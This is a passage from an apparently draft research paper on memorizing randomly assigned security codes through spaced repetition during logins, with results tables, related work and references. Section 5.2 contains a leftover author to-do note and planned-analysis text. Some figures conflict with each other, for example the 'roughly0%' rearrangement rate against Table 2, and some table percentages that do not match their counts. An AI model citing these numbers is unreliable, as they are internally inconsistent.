the alternate hypothesis that the observed difference re-
flects a real percentage of participants who dropped out
due to the security code.
Digging into the data further, we can separate out
those participants who abandoned the study after exactly
two or three games from those who failed to finish later
(no participant quit after the fourth or fifth games). While
no participant in the control quit between two or three
games, 9 participants assigned to letters and 12 assigned
towords did. For participants who completed more than
three games, the rate of failure to finish the study is re-
markably consistent between groups. We do not perform
8
Control Letters Words Total
Signed up for the ‘attention’ study 41 92 90 223
Quit after 2 or 3 games 0/41 0% 9/92 10% 12/90 13% 21/223 9%
Otherwise failed to finish 6/41 15% 14/92 15% 12/90 13% 32/223 14%
Completed the ‘attention’ study 35/41 85% 69/92 75% 66/90 73% 170/223 76%
Received full security code — 63/68 93% 64/65 98% 127/133 95%
Typed entire code from memory — 62/63 99% 64/64 100% 126/127 99%
Participated in first follow-up — 56/63 89% 56/64 88% 112/127 88%
Recalled code correctly — 46/56 82% 52/56 93% 98/112 88%
Participated in second follow-up — 52/56 93% 52/56 93% 104/112 93%
Recalled code correctly — 29/52 56% 32/52 62% 61/104 59%
Table 1: Results summary: participants who signed up for the attention study, the fraction of those participants who
completed the study, the fraction of the remaining participants who entered the first two chunks of their security code
reliably enough to be shown the full security code (all three chunks), the fraction of those remaining who participated
in the follow-up studies (after 3 and 17 days, respectively), and the fraction of those who recalled their security code
correctly. The control group did not receive security codes and hence are excluded from the latter rows of the table.
statistical tests as this threshold is data-derived and any
hypothesis based on it would be post-hoc. Rather, as our
study otherwise presents a overall favorable view of ran-
dom assigned secrets, we present the data in this way as
it illustrates to the reader reason for skepticism regarding
user acceptance among unmotivated participants.
5.1.2 Participants who appeared not to learn
Six participants completed the study without receiving
all three chunks of their security codes, having failed to
demonstrate learning by typing the first chunk (one par-
ticipant from letters ) or second chunk (five participants,
four from letters and one from words ) before the hint ap-
peared. After the conclusion of the study we offered par-
ticipants $1 to provide insights into what had happened
and all replied. Two in the letters group, including the
one who only received one chunk, reported genuine diffi-
culty with memory. The other four stated quite explicitly
(see Appendix E) that they purposely avoided revealing
that they had learned the second chunk to avoid being
assigned more to learn. In the remainder of the discus-
sion, we refer to those who feign inability to recall their
secrets as politicians .
5.1.3 Excluded participants
We found it necessary to exclude four participants from
some of our analysis. Three participants, two in words
and one in letters , discovered and accepted the follow-
up HIT before three days had passed since the end of
the study, ignoring the admonition not to accept this HIT
without an invitation. Though these participants all com-
pleted the 90-game attention study, learned and recalled
their entire security code, we count them as having not
returned for the follow-up. We corrected this bug priorto the second follow-up. We disqualified one additional
‘participant’ in the letters group which appeared to be us-
ing an automated script.This participant logged in more
than ten times per game played and displayed a super-
human typing rate (with just a few milliseconds between
each keystroke). We exclude it from all analysis with the
exception of treating it as having completed the study.
After revealing the deceptive nature of the study we
gave participants the option to withdraw their consent for
us to use our observations of their behavior, while still
receiving full payment. Fortunately, none chose to do so.
5.2 Learning rates
Of non- control participants completing the study, 93%
eventually learned their full security code well enough
to type it from memory three times in a row (91% of
letters and 96% of words ). Excluding the politicians of
Section 5.1.2 who pretended not to learn, these numbers
rise to 97% and 100%, respectively. Most participants
learned their security codes early in the study, after a me-
dian of 36 logins (37 for letters and 33 of words ). We
show the cumulative distribution of when participants
memorized each chunk of their code in Figure 6.
We consider whether participants first typed their
codes from memory in fewer logins with either letters
orwords , with the null hypothesis that encoding had no
impact on this measure of learning speed. A two-tailed
Mann-Whitney U(rank sum) test on the distribution of
these two sets of learning speeds estimates a probability
ofp=0.07 (U=1616) of observing this difference by
chance, preventing us from rejecting the null hypothesis.
We had hypothesized that, with each subsequent
chunk we asked participants to memorize, their learn-
ing speed might decrease due to interference [34] or in-
9
0 10 20 30 40 50 60 70 80 90
Login attempt #0.00.20.40.60.81.0% of participants having memorized chunkWords (1stchunk)
Words (2ndchunk)
Words (3rdchunk)
Letters (1stchunk)
Letters (2ndchunk)
Letters (3rdchunk)Figure 6: We show the proportion of participants who
had memorized each chunk of their security code after
a given number of login attempts. We considered a par-
ticipant to have memorized a chunk after they entered it
without a hint in three consecutive logins.
crease due to familiarity with the system. Learning times
decreased. We use a Mann-Whitney Utest to compare
learning times between the first and final chunks, using
times only for participants who learned all three, yielding
a significant p<0.001 ( U=4717). To remove the im-
pact of the time required to notice the delay and learn that
they could enter the code before it appeared, we compare
the learning times between the third and second chunks.
This difference is much smaller, with a Mann-Whitney
Utest yielding a probability of p=0.39 (U=7646) of
an effect due to chance.
To illustrate the increasing rate of learning we show,
in Figure 7, the percent of participants who typed each
chunk correctly from memory as a function of the num-
ber of previous exposures to that chunk.
[jb: todo:]Was learning speed impacted by the rate
at which participants completed the study? Summary
statistic: distribution of completion times. Correla-
tion coefficient between completion time and 3rd-code
1st-consecutive-unhinted entry scores. [both stored and
didnt store groups]
5.2.1 Eventual learning
Hypothesis: Did participants in one treatment group
(words vs. chars) memorize more of their codes than
the other? Summary statistic: Memorized defined as en-
tering three time consecutively without a hint Statistical
Analysis: Mann Whitney U (Rank Sum) on the number
of codes memorized by each participant to determine if
one group learned more codes than the other
Hypothesis: Did participants in one treatment group
0 10 20 30 40 50 60
# Login attempts since chunk introduced0.00.20.40.60.81.0% of participants correctly recalling chunkWords (1stchunk)
Words (2ndchunk)
Words (3rdchunk)
Letters (1stchunk)
Letters (2ndchunk)
Letters (3rdchunk)Figure 7: For each of the three chunks in participants’ se-
curity codes, we show the proportion of participants who
entered each chunk without a hint as a function of the
number of previous exposures to the chunk (the number
of previous logins in which the chunk appeared). On the
whole, participants actually memorized their second and
third chunks more quickly than the first.
(words vs. chars) memorize their codes more quickly
than the other? Summary statistics: number of trials to
memorize first, second, and third code, measured as (1)
entering it without a hint – for those who did not write it
down Mann-Whitney U Rank Sum test between the two
security code groups to determine whether one is consis-
tently easier to learn than the other. Analysis may not be
useful if one group learned fewer codes than the other.
5.3 Login speed and errors
Overall, participants in the words group took a median
time of 7.7 s to enter their security codes, including wait-
ing for any hints to appear that they needed, and partic-
ipants in the letters group took a median time of 6.0 s.
Restricting our analysis to those logins in which partici-
pants were required to enter all three chunks of the code
only increases the median login time to 8.2 s for words
and 6.1 s for letters .3The distribution had a relatively
long tail, however, with the 95thpercentile of logins tak-
ing 23.6 s for words and 20.5 s for letters .
After computing the median login time for each par-
ticipant, we compared the set of these values for par-
ticipants in the two experimental groups using a Mann-
Whitney U. We can reject the null hypothesis that the dif-
ferences between these medians were the result of chance
3The median login time actually went down for letters participants
when all three chunks were required, likely because this included more
logins typed exclusively from memory with no waiting for a hint.
10
with p<0.01 (U=1452) and conclude that participants
in the letters group were significantly faster.
Errors in entering security codes (whether typos or
genuine memory errors) were relatively rare: over all 90
logins participants in the words group made fewer errors
(with a median of 5) than participants in the letters group
(median 7). Using a Mann-Whitney U, we cannot reject
the null hypothesis that neither group would make more
errors than the other ( p=0.08 (U=1706)).
5.4 Recall of security codes in follow-ups
We sent invitations to participants to follow-up studies
testing recall of their security codes 3 days after the ini-
tial study ended and then 14 more days after they com-
pleted the first follow-up. The median time between
when participants completed the study and actually took
the first follow-up study was 3 days 18 hours (mean 4
days 23 hours). For the second follow-up study the me-
dian time was 16 days 0 hours (mean 16 days 13 hours).
By comparison, the median time to complete the study
itself was 10 days 5 hours (mean 9 days 19 hours).
Overall, 88% of participants recalled their code cor-
rectly in the first follow-up and 59% did so in the sec-
ond. The drop-off at the second follow-up was expected
as memory is believed to decay exponentially with the
delay since the information was last recalled [105].
We had hypothesized that participants in the letters
treatment might be more or less likely to recall their secu-
rity codes correctly in the follow-ups than participants in
thewords treatment. As seen in Table 1, of participants
in the letters group 82% recalled their security codes cor-
rectly in the first follow-up and 56% did so in the second
study, compared to 93% and 62%, respectively, of users
inwords . Using a two-tailed Fisher’s Exact Test, we can-
not rule out the null hypothesis that participants in ei-
ther group were equally likely to recall codes correctly,
with the observed differences occurring with a p=0.15
chance in the first follow-up and p=0.45 in the second
follow-up under the null hypothesis.
5.4.1 Types of errors
We observed 14 participants incorrectly entering their
code in the first follow-up and 52 in the second. All 13
users who entered incorrectly in the first follow-up and
participated in the second entered their code incorrectly
again. This sample is too low to draw firm conclusions
about the nature of participants’ recall errors, but we
provide some preliminary analysis with a breakdown of
errors in the second follow-up in Table 2.
We did see evidence that users retained partial mem-
ory, with 75% of users entering at least one component
of their code correctly in the second follow-up and nearlyhalf missing only one component or entering compo-
nents in the wrong order. Re-arranging the order of com-
ponents, which accounted for roughly0% of errors, could
be corrected by accepting components in any order at
a loss of only log2(3!)≈2.6 bits of security. Unfortu-
nately, the majority of other errors could not be corrected
without significantly downgrading security. Only 3 par-
ticipants (6%) in the second-followup (and 2 in the first)
entered a code within an edit distance of 2 of the correct
code. We present further information on the types of er-
rors observed in the extended version of this paper [25].
5.4.2 Storing security codes
A minority of participants reported storing their security
code outside of their memory, as presented in Table 3.
We were concerned that participants who had stored their
security codes might have been tempted to look them up
and thereby inflated the recall rate during the follow-up.
However, only 82% of participants storing their security
code recalled it correctly on follow-up, whereas 89% of
participants not storing the security code did. While it’s
possible that participants who did not rely on a stored
code were better able to remember as a result, we had not
hypothesized this in advance nor would the differences
we observed have been statistically significant.
We had hypothesized that participants might be more
likely to write down or otherwise store codes outside
their memory if assigned a code composed of letters as
opposed to words, or vice versa. The null hypothesis is
that treatment has no impact on the choice to store codes.
In the completion survey, 18 of the 69 participants in
theletters treatment reported having stored their security
code, as compared to 10 of the 66 in the words treatment.
We use a two-sided Fisher’s Exact Test to estimate that
such a difference would occur with probability p=0.14
under the null hypothesis. Thus we can not conclude that
either treatment made participants more likely to write
their code down.
5.5 Preferences
As part of the debriefing, we explained that one possible
application of an assigned random security code would
be for use as a master key for a password manager—
a single password to protect all of a participants’ other
passwords. We then asked participants whether they pre-
ferred a memorized code to a code they would copy from
an SMS, from a phone app, or to using a USB key as an
authentication token. Participants expressed a preference
for security codes in all cases: 63% of participants stated
they preferred using a security code to a phone app (with
4% expressing no preference), 61% preferred using a se-
curity code to receiving an SMS (5% no preference), and
11
Letters Words Total
N=28 N=24 N=52
components rearranged 2 (7.1%) 3 (12.5%) 5 (9.6%)
one component wrong 9 (32.1%) 11 (45.8%) 20 (38.5%)
not entered 2 (7.1%) 6 (20.8%) 8 (13.5%)
two components wrong 4 (14.3%) 5 (20.8%) 9 (17.3%)
not entered 1 (3.6%) 3 (12.5%) 4 (7.7%)
all components wrong 13 (28.6%) 5 (20.8%) 18 (25.0%)
not entered 5 (17.9%) 4 (16.7%) 9 (17.3%)
Table 2: Types of errors made by participants when attempting to recall their code during the second follow-up study
after a period of at least 14 days from the first follow-up. The “not entered” sub-rows detail participants who made no
attempt to enter components they couldn’t recall exactly.
Did you store any part of the additional security code for the
study website, such as by writing it down, emailing it to
yourself, or adding it to a password manager?
‘Yes’ ‘No’
Letters Words Letters Words
Completed the study 18/68 26% 10/65 15% 50/68 74% 55/65 85%
Reported storing password 11/18 61% 6/10 60% 2/50 4% 0/55 0%
Received full security code 16/18 89% 9/10 90% 47/50 94% 55/55 100%
Participated in follow-up 14/16 88% 8/9 89% 42/47 89% 48/55 87%
Recalled code correctly 12/14 86% 6/8 75% 34/42 81% 46/48 96%
Table 3: A minority of participants reported storing their security code outside of their memory. Each row corresponds
to an identically-named row in Table 1, separated by participants’ response to the code storage question in each column.
The first row shows the fraction of all participants who completed the study in each group, and each subsequent row
as a fraction of the one above, except for the italicized row which identifies participants who reported storing their
self-chosen password (which was much more common amongst participants who stored their security code).
12
66% preferred using a security code to using a USB ( 4%
no preference). Using an exact Binomial test to compute
the probability of these observations occurring under a
null hypothesis that participants had no preference be-
tween memorized security codes and other mechanisms,
each had a probability of p<0.02 of occurring under
the null hypothesis. Still, we don’t take much real-world
significance from these responses as participants might
indicate a preference for assigned security codes because
that was the answer we wanted to hear.
We feel it would be more legitimate to compare the
levels of preference to other authentication means be-
tween the letters and words treatments as a proxy to
determine if participants enjoyed either treatment more.
However, participants from both treatments expressed
a preference for security codes of alternative means at
nearly identical rates and so we are unable to reject the
null hypothesis that participants enjoyed both treatments
equally well.
6 Limitations
6.1 Ecological validity
Whenever testing a new approach to security, its novelty
alone may be enough to reveal to research participants
that it is the focus of the study. Despite our best efforts,
of the 133 participants in the experimental groups who
completed the study (68 in letters and 65 in words ), only
35 (26%, 24 from letters and 11 from words ) reported
that they did not suspect that the security code might be
the focus of the study. The majority, 70 (53%, 28 from
letters and 42 from words ) reported having some suspi-
cion and 28 (21%, 16 from letters and 12 from words )
reported being ‘certain’ the security code was the focus
of the study. Still, to our knowledge no participants re-
vealed any ‘spoilers’ on public forums. Participants who
suspected we were studying their ability to learn the se-
curity code may have tried harder to memorize the code
than if they had not, though it’s not clear how their effort
would compare to that of a real-world user relying on a
randomly-assigned code to secure something valuable.
6.2 Assistance
During our study, we did not turn off the assistive fea-
tures of our interface, which turned incorrect charac-
ters red and provided hints after a delay, regardless of
how quickly participants learned their full security codes
(though we provided no assistance for the follow-up).
We made this choice in part because the data we col-
lected can inform the design of algorithms for determin-
ing when it is appropriate to remove this assistance. Evenafter turning off these assistive features, systems that as-
sign security codes composed of words can autocomplete
and correct spelling errors using the full set of all words
used to construct security codes, as the full word list is
not secret and assumed to be known to attackers.
6.3 Linguistic homogeneity
Our experiment used only Latin letters and English-
language words. While all of our participants understood
English well enough to read the instructions and partici-
pate and 96% stated that it is their native language, using
different character and words sets with participants who
speak languages other than English might yield differ-
ent results. This is generally an under-studied aspect of
password security [27].
7 Background and related work
7.1 The history of random passwords
Taking the long view of human history, user-chosen pass-
words are a relatively new phenomenon. Prior to the in-
vention of computers, spoken passwords were used to
verify membership in a common group which required
users to remember an assigned password. Spoken pass-
words have been used by militaries dating at least back
to the ancient Roman empire [81], in which all soldiers
were required to learn a new “watchword” nightly to use
if challenged by a sentry. By World War II, militaries
developed a three-step protocol involving three secret
words (a challenge, sign, and countersign), all of which
were updated daily [72].4Similar protocols have been
used by secret societies [18], in some cases requiring far
more information to be memorized.
With the development of computers, passwords came
into use for human-to-computer authentication and for
the first time self-chosen secret passwords were possi-
ble. CTSS, among the first systems deploying passwords
in 1961, allowed user chosen passwords and enterpris-
ing students soon began the first guessing attacks to gain
the use of additional computing quota [102]. With the
development of Multics in the 1970s, the weakness of
user-chosen passwords came to be considered a serious
security problem [58]. Multics offered a feature to gener-
ate random passwords for users in the form of a random
sequence of pseudo-words5[50, 106]. For example,:
qua-vu ri-ja-cas te-nort oi-boay fleck-y
Somewhat surprisingly, an experiment at an Air Force
Data Services center in 1977 indicated that after being
4Most famously, Allied soldiers used the sequence ‘flash,’ ‘thunder,’
‘welcome’ on D-Day.
5The hyphens were presented by Multics to aid pronunciation only
and did not need to be typed.
13
given the option to choose their own passwords, only
50% of users did [106]. Still, the U.S. Department of
Defense’s password management guidelines, published
in 1985 [29] and later adopted as a NIST standard, stip-
ulated that all passwords should be machine-generated
to avoid weak user-chosen passwords. NIST also pub-
lished a standard for producing random passwords in
1993 [2]. However, initial ethnographic studies of pass-
words in the late 1980s found large number of users writ-
ing down passwords [92, 111], particularly when forced
to use machine-generated passwords, and suggested that
because of this machine-generated passwords were likely
providing less security than user-chosen passwords.
By the 1990s, most enterprises had replaced machine-
chosen passwords with user-chosen passwords [4] and
user-chosen passwords have always predominated for
web authentication. By 2006, NIST guidelines presumed
all passwords are user-chosen [35]. Interestingly, a par-
allel transition occurred in the case of banking PINs,
which were initially machine-chosen until the 1980s
when banks gradually began allowing user-chosen PINs
which is now predominant [24].
7.2 Physiological principles of memory
Human memory has been studied extensively by psy-
chologists (as well as neuroscientists and others). The
spacing effect describes how people are better able to re-
call information if it is presented for the same duration,
but in intervals spaced over a longer period of time. This
effect was first described by Hermann Ebbinghaus in the
19thcentury [47] and is considered one of the most ro-
bust memory effects [10]. It has even been demonstrated
in animals. The effect is almost always far more pow-
erful than variations in memory between individual peo-
ple [38].
The cause of the spacing effect is still under debate,
but most theories are based around the multi-store model
of memory [36] in which short-term (or working mem-
ory) and long-term memory are distinct neurological pro-
cesses [8, 9]. One theory of the spacing effect posits
that when information is presented which has left short-
term memory, a trace of it is recognized from long-term
memory [51] and hence stimulated, strengthening the
long-term memory through long-term potentiation [14]
of neural synapses. Thus, massed presentation of in-
formation is less effective at forming long-term memo-
ries because the information is recognized from work-
ing memory as it is presented. In our case, the natural
spacing between password logins is almost certainly long
enough for the password to have left working memory.
Early work on spaced learning focused on expanding
presentation in which an exponentially increasing inter-
val between presentations was considered optimal [80,69]. More recent reviews have suggested that the pre-
cise spacing between presentations is not particularly im-
portant [11] or that even spacing may actually be supe-
rior [59]. This is fortunate for our purposes as password
logins are likely to be relatively evenly spaced in time.
Other work has focused on dynamically changing spac-
ing using feedback from the learner such as speed and
accuracy of recall [78] which could potentially guide ar-
tificial rehearsal of passwords.
A number of other memory effects have been ex-
perimentally demonstrated help humans to form (and
strengthen) long-term memories. The dual-coding ef-
fectdescribes how people remember information better
if they have multiple mental encodings for it, such as an
image and words describing it [77]. This could be ap-
plied directly to password training.
The processing effect [42] describes how people re-
member information better if they have been forced to
more deeply process it mentally, such as writing or
speaking words aloud instead of simply reading them.
Our system exploits this effect to some degree by re-
quiring typing. It could potentially do so more strongly
through extended manipulation of security codes during
training, though this might be too distracting or time-
consuming to add to users’ routine login process.
Finally, the related generation effect [90] describes
how people retain more information if they generate
some of it during presentation, such as thinking of the
answers to factual questions themselves instead of sim-
ply being given the answers. For example, in password
training instead of showing the word “big” a question
like “what is the opposite of small?” or a fill-in-the-
blank such as “The Lebowski” could be presented.
Again, this technique might be considered too distract-
ing to use.
7.3 Approaches to random passwords
Many proposals have aimed to produce random pass-
words which are easier for humans to memorize, im-
plicitly invoking several principles of human memory.
Early proposals typically focused on pronounceable ran-
dom passwords [50, 106] in which strings were produced
randomly but with an English-like distribution of letters
or phonemes. This was the basis for NIST’s APG stan-
dard [2], though that specific scheme was later shown to
be weak [49]. The independently-designed pwgen com-
mand for generating pronounceable passwords is still
distributed with many Unix systems [5].
Generating a random set of words from a dictionary, as
we did in our words treatment, is also a classic approach,
now immortalized by the web comic XKCD [76]. This
was first proposed by Kurzban [68] with a very small 100
word dictionary, the popular Diceware project [6] offers
14
4,000 word dictionaries. Little available research exists
on what size and composition of dictionaries is optimal.
Finally, a number of proposals have aimed to enhance
memorability of a random string by offering a secondary
coding such as a set of images [64], a grammatical sen-
tence [7, 55], or a song [74]. Brown’s passmaze proto-
col was recognition-based, with users simply recogniz-
ing words in a grid [32]. None of these proposals has
received extensive published usability studies.
7.4 Studies on password recall
A number of studies have examined user performance
in recalling passwords under various conditions. These
studies often involve users choosing or being assigned a
new password in an explicitly experimental setting, and
testing the percentage of users who can correctly recall
their password later. Surprisingly, a large number of
studies have failed to find any statistically significant im-
pact on users’ ability to recall passwords chosen under
a variety of experimental treatments, including varying
length and composition requirements [112, 83, 108, 101,
67] or requiring sentence-length passphrases [61].6The
consistent lack of impact of password structure on recall
rates across studies appears to have gone unremarked in
any of the individual studies.
However, several studies have found that stricter com-
position requirements increase the number of users writ-
ing their passwords down [83, 67] and users self-report
that they believe passwords are harder to remember when
created under stricter password policies [67, 108].
At least three studies have concluded that users are
more likely to remember passwords they use with greater
frequency [112, 31, 46]. This suggests that lack of ad-
equate training may in fact be the main bottleneck to
password memorization, rather than the inherent com-
plexity of passwords themselves. Brostoff [31] appears
to have made the only study of password automacity (the
ability to enter a password without consciously thinking
about it), and estimated that for most users, this property
emerges for passwords they type at least once per day.
A few studies have directly compared recall rates of
user-generated passwords to assigned passwords. Inter-
estingly, none has been able to conclude that users were
less likely to remember assigned passwords. For exam-
ple, in a 1990 study by Zviran and Haga [111] in which
users were asked to generate a password and then recall it
3 months later, recall was below 50% for all unprompted
text passwords and no worse for system-assigned random
passwords, though the rate of writing increased. A simi-
lar lab study by Bunnell et al. found a negligibly smaller
difference in recall rate for random passwords [33]. A
6Keith et al. [61] did observe far more typos with sentence-length
passwords, which needed correcting to isolate the effective recall rates.2000 study by Yan et al. [108] found that users as-
signed random passwords for real, frequently-used ac-
counts actually requested fewer password resets than
users choosing their own passwords, though those users
were also encouraged to write their passwords down “un-
til they had memorized them.” Stobert in 2011 [93] found
no significant difference in recall between assigned and
user-chosen text passwords, though did find significantly
higher rates of users forgetting assigned graphical pass-
words compared to either text condition.
Two studies have exclusively compared user’s ability
to recall random passwords under different encodings.
The results of both were inconclusive, with no signifi-
cant difference in recall rate between users given random
alphanumeric strings, random pronounceable strings or
randomly generated passphrases at a comparable secu-
rity level of 30 [89] or 38 bits [71]. The results ap-
pear robust to significant changes in the word dictionary
used for passwords or the letters used in random strings.
However, users stated that alphanumeric strings seemed
harder to memorize than random passphrases [89].
All of these studies except that of Yan et al. face va-
lidity concerns as the passwords were explicitly created
for a study of password security. A 2013 study by Fahl
et al. [48] compared user behavior in such scenarios and
found that a non-trivial proportion of users behave signif-
icantly differently in explicit password studies by choos-
ing deliberately weak passwords, while a large number of
users re-use real passwords in laboratory studies. Both
behaviors bias text passwords to appear more memo-
rable, as deliberately weak passwords may be easy to
memorize and existing passwords may already be mem-
orized. Also of concern, all of these studies (again ex-
cluding Yan et al.) involved a single enrollment process
followed by recall test, with no opportunity for learning.
One study explicitly tested spaced repetition as an aid
to memorizing user-chosen passwords. Vu et al. [101]
found that users who were asked to re-enter their pass-
word after a 5-minute delay were significantly less likely
to forget their password when asked again a week later.
Users who re-entered their password immediately after
enrolling performed didn’t perform significantly differ-
ently than users who didn’t need to re-enter at all, demon-
strating a measurable benefit to memorization from even
a single delayed repetition.Spaced repetition for pass-
words was recently suggested by Blocki et al. [16], who
proposed designing password schemes which insert a
minimal number of artificial rehearsals to maintain se-
curity. After our study, Blocki published results from
a preliminary study on mnemonic passwords with for-
mal rehearsals [15]. Compared to our study, participants
performed a much lower number of rehearsals spaced
(about 10) spaced over a longer period (up to 64 days),
prompted by the system at specific times rather than at
15
the participant’s convenience. Unlike our study partic-
ipants were aware that memorization was the explicit
goal of the study. Blocki also incorporated additional
mnemonic techniques (images and stories). This study
provides evidence that spaced repetition and other tech-
niques can be applied more aggressively for motivated
users, whereas as our study demonstrates the practicality
with few system changes and unmotivated users.
7.5 Alternative authentication schemes
Several approaches have been explored for exploiting
properties of human memory in authentication systems.
One approach is to query already-held memories us-
ingpersonal knowledge question schemes such as “what
is your mother’s maiden name?” though more sophis-
ticated schemes have been proposed [110, 53] While
these schemes typically enable better recall than pass-
words, they are vulnerable to attacks by close social re-
lations [88], many people’s answers are available in on-
line search engines or social networks [85], and many
questions are vulnerable to statistical guessing [23, 88].
An advantage of personal knowledge questions is that
they represent cued recall with the question acting as
a cue, which generally increases memory performance
over free recall . Other attempts have been made to ex-
ploit cued recall, for example giving the user a set of
prompts (such as black ,long ) and having them choose
words they thought of in response (such as beauty ,
winter ) [91]. This was shown to increase long-term re-
call over basic passwords [111]. However, this approach
suffers guessing vulnerability similar to personal knowl-
edge questions, especially to acquaintances [33, 82].
A more conservative approach is to automatically gen-
erate cues for user-chosen passwords such as the pass-
word’s first letter [73]. This approach improves re-
call [52, 66]. However, the primary benefit is lessening
interference effects by making it clear which of a user’s
multiple already-memorized passwords they need to en-
ter [109]. It remains unclear if cued recall can be ex-
ploited to help users actually recall stronger passwords.
Graphical passwords aim to utilize humans’ strong
abilities to recognize visual data [13]. Some schemes
employ cued recall only by asking users to recognize
a secret image from a set [44, 103, 95]. Others use
uncued memory by asking users to draw a secret pat-
tern [54, 96, 12] or click a set of secret points in an im-
age [104, 40]. These schemes are often still vulnerable
to guessing attacks due to predictable user choices [43,
98, 99]. The Persuasive Cued Click-Points scheme [39]
attempts to address this by forcing users to choose points
within a system-assigned region, which was not found
to significantly reduce recall. Still, it remains unclear ex-
actly what level of security is provided by most graphicalschemes and they generally take longer to authentication
than typing a text password. They have found an im-
portant niche on mobile devices with touch screens, with
current versions of Android and Windows 8 deploying
graphical schemes for screen unlock.
Bojinov et al. [17] proposed the use of implicit mem-
ory for authentication, training users to type a random
key sequence in rapid order using a game similar to one
used in psychological research to study implicit mem-
ory formation [87]. After a 30–45 minute training pe-
riod, users were tested 1–2 weeks later on the same game
with their trained sequences and random sequences, with
about half performing significantly better on trained se-
quences. Such a scheme offers the unique property that
users are unaware of their secret and thus incapable of
leaking it to an attacker who doesn’t know the correct
secret challenge to test on, providing a measure of re-
sistance against “rubber-hose” attacks (physical torture).
Without dramatic improvements however this scheme is
impractical for normal personal or corporate logins due
to the very long enrollment and login times and the low
rate of successful authentication.
8 Open questions and future work
As this was our first exploration of spaced repetition for
learning random secrets, many of our design choices
were best guesses worthy of further exploration. The
character set used when encoding secrets as letters,
namely 26 lowercase letters, might be inferior to an ex-
panded set such as base-32 with digits included [56]. Our
choice of a dictionary of 676 words is almost surely not
optimal, since we deliberately chose it for equivalence to
the size of our character set. Splitting the secret into three
equal-sized chunks was also simply a design heuristic,
performance might be better with more or fewer chunks.
We expect spaced repetition to be a powerful enough
tool for users to memorize secrets under a variety rep-
resentation formats, though the precise details may have
important implications. We observed letters to be slightly
faster to type and words slightly faster to learn. We also
observed double the rate of forgotten codes after three
days in the letters group and, though this difference was
not statistically significant given our sample sizes and the
low absolute difference, this is worthy of further study as
this difference could be important in practice.
Our system can likely be improved by exploiting ad-
ditional memory effects, such as dual-coding secrets by
showing pictures next to each word or requiring greater
depth of processing during each rehearsal. Cued recall
could also be utilized by showing users random prompts
(images or text) in addition to a random password.
On the downside, interference effects may be a ma-
jor hindrance if users were asked to memorize multiple
16
random passwords using a system like ours. This is wor-
thy of further study, but suggests that random passwords
should only be used for critical accounts.
Changing the login frequency may decrease or in-
crease performance. We aimed to approximate the num-
ber of daily logins required in an enterprise environment
in which users lock their screen whenever leaving their
desks. In this context, the trade-offs appear reasonable
if newly-enrolled users can learn a strong password after
two weeks of reduced security (to the level of a user-
chosen password) with about 10 minutes of aggregate
time spent learning during the training period.
In contexts with far fewer logins, such as password
managers or private keys which might be used once
per day or less, learning might require a larger number
of total logins. If a higher total number of logins are
needed and they occur at a slower rate, this may lead
to an unacceptable period of reduced security. In this
case, security-conscious users could use rehearsals out-
side of authentication events. Further, if codes are used
extremely infrequently after being memorized, artificial
rehearsals may be desirable even after learning the secret.
These are important cases to study, in particular as these
are cases in which there is no good alternative defense
against offline brute-force attacks.
While the learning rates of our participants did not
slow down as the number of chunks they memorized in-
creased, they might have more have trouble as the num-
ber of chunks grows further or as they have to asso-
ciate different codes with different accounts. Fortunately,
most users only have a small number of accounts valu-
able enough to require a strong random secret.
9 Conclusion
For those discouraged by the ample literature detailing
the problems that can result when users and security
mechanisms collide, we see hope for the human race.
Most users canmemorize strong cryptographic secrets
when, using systems freed from the constraints of tradi-
tional one-time enrollment interfaces, they have the op-
portunity to learn over time. Our prototype system and
evaluation demonstrate the brain’s remarkable ability to
learn and later recall random strings—a fact that sur-
prised even participants at the conclusion of our study.
10 Acknowledgments
We thank Janice Tsai for assistance and suggestions on
running an ethical experiment, Serge Egelman and David
Molnar for help running our experiment on Mechanical
Turk, and Arvind Narayanan, Cormac Herley, Paul van
Oorschot, Bill Bolosky, Ross Anderson, Cristian Bravo-Lilo, Craig Agricola and our anonymous peer reviewers
for many helpful suggestions in presenting our results.
17
References
[1] HashCat project. http://hashcat.net/hashcat/ .
[2] “Automated Password Generator (APG)”. NIST Federal Infor-
mation Processing Standards Publication (1993).
[3] Bitcoin currency statistics. blockchain.info/stats , 2014.
[4] A DAMS , A., S ASSE , M. A., AND LUNT, P. Making passwords
secure and usable. In People and Computers XII . Springer Lon-
don, 1997, pp. 1–19.
[5] A LLBERY , B. pwgen—random but pronounceable password
generator. USENET posting in comp.sources.misc (1988).
[6] A RNOLD , R. G. The Diceware Passphrase Home Page. world.
std.com/ ~reinhold/diceware.html , 2014.
[7] A TALLAH , M. J., M CDONOUGH , C. J., R ASKIN , V., AND
NIRENBURG , S. Natural language processing for information
assurance and security: an overview and implementations. In
Proceedings of the 2000 New Security Paradigms Workshop
(2001), ACM, pp. 51–65.
[8] A TKINSON , R. C., AND SHIFFRIN , R. M. Human memory: A
proposed system and its control processes. The Psychology of
Learning and Motivation 2 (1968), 89–195.
[9] B ADDELEY , A. Working memory. Science 255 , 5044 (1992),
556–559.
[10] B ADDELEY , A. D. Human memory: Theory and practice . Psy-
chology Press, 1997.
[11] B ALOTA , D. A., D UCHEK , J. M., AND LOGAN , J. M. Is ex-
panded retrieval practice a superior form of spaced retrieval? A
critical review of the extant literature. The foundations of re-
membering: Essays in honor of Henry L. Roediger, III (2007),
83–105.
[12] B ICAKCI , K., AND VAN OORSCHOT , P. C. A multi-word pass-
word proposal (gridWord) and exploring questions about sci-
ence in security research and usable security evaluation. In Pro-
ceedings of the 2011 New Security Paradigms Workshop (2011),
ACM, pp. 25–36.
[13] B IDDLE , R., C HIASSON , S., AND VANOORSCHOT , P. C.
Graphical passwords: Learning from the first twelve years.
ACM Computing Surveys (CSUR) 44 , 4 (2012), 19.
[14] B LISS, T. V., AND LØMO , T. Long-lasting potentiation of
synaptic transmission in the dentate area of the anaesthetized
rabbit following stimulation of the perforant path. The Journal
of Physiology 232 , 2 (1973), 331–356.
[15] B LOCKI , J. Usable Human Authentication: A Quantitative
Treatment . PhD thesis, Carnegie Mellon University, June 2014.
[16] B LOCKI , J., B LUM , M., AND DATTA , A. Naturally rehears-
ing passwords. In Advances in Cryptology-ASIACRYPT 2013 .
Springer, 2013, pp. 361–380.
[17] B OJINOV , H., S ANCHEZ , D., R EBER , P., B ONEH , D., AND
LINCOLN , P. Neuroscience meets cryptography: designing
crypto primitives secure against rubber hose attacks. In Pro-
ceedings of the 21st USENIX Security Symposium (2012).
[18] B OND , M. The dining Freemasons (security protocols for secret
societies). In Security Protocols (2007), Springer, pp. 266–275.
[19] B ONNEAU , J. Guessing human-chosen secrets . PhD thesis,
University of Cambridge, May 2012.
